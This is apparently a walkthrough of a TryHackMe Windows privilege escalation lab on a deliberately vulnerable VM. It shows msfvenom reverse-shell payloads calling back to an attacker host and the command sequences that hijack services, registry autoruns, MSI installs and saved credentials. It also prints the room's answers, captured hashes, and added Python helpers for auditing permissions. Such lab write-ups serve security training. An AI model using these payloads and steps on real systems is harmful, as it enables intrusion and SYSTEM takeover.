Tryhackme - Windows PrivEsc

In this walkthrough, we will be going through the Windows PrivEsc room from TryHackMe. This room is rated as Medium on the platform and lets us practice our Windows privilege escalation skills on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM. So, let’s get started without any delay.

Windows PrivEsc

Task 1 – Deploy the Vulnerable Windows VM

Task 2 – Generate a Reverse Shell Executable

Question 1 – Generate a reverse shell executable and transfer it to the Windows VM. Check that it works!

Done

wh1terose@fsociety:~/CTF/TryHackme/Windows Privesc$ sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.11.103 LPORT=4444 -f exe -o reverse.exe
/usr/bin/msfvenom: 14: cd: can't cd to /home/wh1terose/CTF/TryHackme/Windows
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

msfvenom payload

wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.225.25,49812)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:4141414141414141:465098c53c0be448156c5c7263e69cbf:...
[-] Unknown level for query path info! 0x109
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.225.25,49812)
[*] Remaining connections []

smbserver.py

reverse.exe

Task 3 – Service Exploits – Insecure Service Permissions

Question 1 – What is the original BINARY_PATH_NAME of the daclsvc service?

C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
[SC] ChangeServiceConfig SUCCESS

C:\PrivEsc>net start daclsvc

C:\Program Files\DACL Service\daclservice.exe

Task 4 – Service Exploits – Unquoted Service Path

Question 1 – What is the BINARY_PATH_NAME of the unquotedsvc service?

C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
[SC] ChangeServiceConfig SUCCESS

C:\PrivEsc>net start daclsvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.


C:\PrivEsc>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
        1 file(s) copied.

C:\PrivEsc>net start unquotedsvc

unquotedpathservice.exe

C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
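
Task 4 comes down to reading BINARY_PATH_NAME and working out which intermediate files Windows would probe before the real binary. The Python below is an added example, not code from the walkthrough or the room: it parses `sc qc` output (a constructed sample in the shape shown above), lists the probe paths for an unquoted path with spaces, and emits the quoted `sc config ... binpath=` fix in the escaped form the walkthrough itself uses. Function names are my own.

```python
import re

# Constructed sample in the shape `sc qc` prints in the walkthrough
# (backslashes doubled for the Python literal).
SC_QC_UNQUOTED = """SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(output):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def split_exe_and_args(binary_path):
    """Split an unquoted path into (executable, arguments); the executable
    ends at the first '.exe' (case-insensitive)."""
    end = binary_path.lower().find(".exe")
    if end < 0:
        return binary_path, ""
    return binary_path[:end + 4], binary_path[end + 4:]

def hijack_candidates(binary_path):
    """For an unquoted BINARY_PATH_NAME containing spaces, list the files
    CreateProcess tries before the real binary (each space-delimited prefix
    with .exe appended). An empty list means the path needs no fix."""
    if binary_path.startswith('"') or " " not in binary_path:
        return []
    exe_path, _ = split_exe_and_args(binary_path)
    parts = exe_path.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def fix_command(service, binary_path):
    """Return the `sc config` command that quotes the executable path, in the
    same escaped form the walkthrough uses for `binpath=`; None if not needed."""
    if not hijack_candidates(binary_path):
        return None
    exe_path, args = split_exe_and_args(binary_path)
    return f'sc config {service} binpath= "\\"{exe_path}\\"{args}"'
```

Any of the listed probe paths sitting in a directory that BUILTIN\Users can write to (as accesschk showed for "C:\Program Files\Unquoted Path Service") is the condition to fix.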

Task 5 – Service Exploits – Weak Registry Permissions

Question 1 – Read and follow along with the above.

Done

C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Insecure Registry Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW BUILTIN\Administrators
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS

C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
The operation completed successfully.

C:\PrivEsc>net start regsvc

Task 6 – Service Exploits – Insecure Service Executables

Question 1 – Read and follow along with the above.

Done

C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\File Permissions Service\filepermservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : File Permissions Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
The system cannot find the file specified.

C:\PrivEsc>copy \\10.18.11.103\kali\reverse.exe C:\PrivEsc\reverse.exe
        1 file(s) copied.

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
        1 file(s) copied.

C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\File Permissions Service\filepermservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : File Permissions Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
        1 file(s) copied.

C:\PrivEsc>net start filepermsvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.

filepermservice.exe

Task 7 – Registry – AutoRuns

Question 1 – Read and follow along with the above.

Done

C:\PrivEsc>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    My Program    REG_SZ    "C:\Program Files\Autorun Program\program.exe"


C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

AccessChk v4.02 - Check access of files, keys, objects, processes or services
Copyright (C) 2006-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
        1 file(s) copied.

program.exe

nt authority
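
Tasks 5, 6 and 7 all rely on the same accesschk check: a low-privilege principal with write access to something SYSTEM will run (the service registry key, the service binary, the autorun executable). The Python below is an added example, not code from the walkthrough or the room: it parses accesschk's object-permission output (a constructed sample in the shape shown above; run accesschk with -q so no banner precedes the object line) and reports low-privilege principals holding write rights. The function names and the LOW_PRIV set are my own assumptions.

```python
import re

# Principals any local user is a member of; write access for one of these on
# something SYSTEM executes is a finding (assumed list, extend as needed).
LOW_PRIV = {"Everyone", "BUILTIN\\Users", "NT AUTHORITY\\INTERACTIVE",
            "NT AUTHORITY\\Authenticated Users"}

# Constructed sample: two accesschk runs (registry key, then file) in the
# shape the walkthrough shows; use -q so no banner precedes the object line.
ACCESSCHK_OUTPUT = r"""HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS
C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS
"""

def parse_accesschk(output):
    """Group output as {object: {principal: (marker, [rights])}}. Object
    lines start at column 0, principal lines are indented and begin with
    R, W or RW, and right names are indented further still."""
    objects, obj, who = {}, None, None
    for line in output.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            obj, who = line.strip(), None
            objects[obj] = {}
        elif obj and (m := re.match(r"^\s+(RW|R|W)\s+(.+?)\s*$", line)):
            who = m.group(2)
            objects[obj][who] = (m.group(1), [])
        elif who:
            objects[obj][who][1].append(line.strip())
    return objects

def writable_by_low_priv(output):
    """Return {object: {principal: [rights]}} for low-privilege principals
    holding write access (accesschk marks them W or RW)."""
    findings = {}
    for obj, acl in parse_accesschk(output).items():
        hits = {p: r for p, (mark, r) in acl.items()
                if "W" in mark and p in LOW_PRIV}
        if hits:
            findings[obj] = hits
    return findings
```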

Task 8 – Registry – AlwaysInstallElevated

Question 1 – Read and follow along with the above.

Done

wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.11.103 LPORT=1234 -f msi -o reverse.msi
[?] Would you like to init the webservice? (Not Required) [no]: no
[?] Would you like to delete your existing data and configurations? []: yes
Clearing http web data service credentials in msfconsole
Running the 'init' command for the database:
Existing database found, attempting to start it
Starting database at /home/wh1terose/.msf4/db...success
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi
wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ ls
reverse.exe  reverse.msi
wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
[sudo] password for wh1terose: 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.165.120,49710)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:4141414141414141:b978bb131fc26e4ee84d9fc63507ea58:01010000000000000054203b1e84d901dbcec77ee99a0fbd000000000100100062004b007700440048005200520077000300100062004b0077004400480052005200770002001000440046005800680066007000700072000400100044004600580068006600700070007200070008000054203b1e84d901060004000200000008003000300000000000000000000000002000007d4b5ce9918fb05e3cd6a3d21ca39d3aa0b524095c2842e45278ef703d4077850a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310038002e00310031002e00310030003300000000000000000000000000
[-] Unknown level for query path info! 0x109
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)

msfvenom payload

C:\PrivEsc>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\PrivEsc>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\PrivEsc>copy \\10.18.11.103\kali\reverse.msi C:\PrivEsc\reverse.msi
        1 file(s) copied.

C:\PrivEsc>msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

C:\PrivEsc>

reverse.msi

nt authority

Task 9 – Passwords – Registry

Question 1 – What was the admin password you found in the registry?

password123

Task 10 – Passwords – Saved Creds

Question 1 – Read and follow along with the above.

Done

C:\PrivEsc>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02nfpgrklkitqatu
    Local machine persistence

    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin


C:\PrivEsc>runas /savecred /user:admin C:\PrivEsc\reverse.exe
Attempting to start C:\PrivEsc\reverse.exe as user "WIN-QBA94KB3IOF\admin" ...

C:\PrivEsc>savecred.bat

C:\PrivEsc>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02nfpgrklkitqatu
    Local machine persistence

    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin


C:\PrivEsc>

cmdkey/list

Task 11 – Passwords – Security Account Manager (SAM)

Question 1 – What is the NTLM hash of the admin user?

a9fdfa038c4b75ebc76dc855dd74f0da

Task 12 – Passwords – Passing the Hash

Task 13 – Scheduled Tasks

Task 14 – Insecure GUI Apps

Task 15 – Startup Apps

Task 16 – Token Impersonation – Rogue Potato

Question 1 – Name one user privilege that allows this exploit to work.

SeImpersonatePrivilege

Question 2 – Name the other user privilege that allows this exploit to work.

SeAssignPrimaryTokenPrivilege

Task 17 – Token Impersonation – PrintSpoofer

Task 18 – Privilege Escalation Scripts

So that was “Windows PrivEsc” for you. In this room, we covered a variety of Windows privilege escalation techniques which we can use once we have landed on a Windows machine. Well, the best thing on any machine is to be SYSTEM/admin, and today we have learned how we can get to that point. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
